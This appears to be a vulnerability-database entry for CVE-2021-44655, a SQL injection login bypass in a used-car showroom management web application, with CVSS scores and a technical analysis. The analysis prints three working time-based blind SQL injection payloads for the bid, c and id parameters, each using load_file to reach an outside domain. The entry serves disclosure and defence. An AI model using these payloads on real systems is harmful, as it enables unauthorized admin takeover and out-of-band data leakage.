Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
1

CVE-2021-44655

Disclosure Date: December 15, 2021
CVE-2021-44655 CVSS v3 Base Score: 9.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated

Description

Online Pre-owned/Used Car Showroom Management System 1.0 contains a SQL injection authentication bypass vulnerability. Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form allowing attacker to get admin access on the application.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Gives privileged accessVulnerable in default configuration
Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

The bid, c & id parameters from /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to Multiple time-based blind SQL injection attacks. The payload ‘+(select load_file(’\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj’))+’ was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

  • Multiple: bit, c & id
---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---


---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---

Reproduce:

href

Proof and Exploit:

href

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • online pre-owned/used car showroom management system project

Products

  • online pre-owned/used car showroom management system 1.0

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis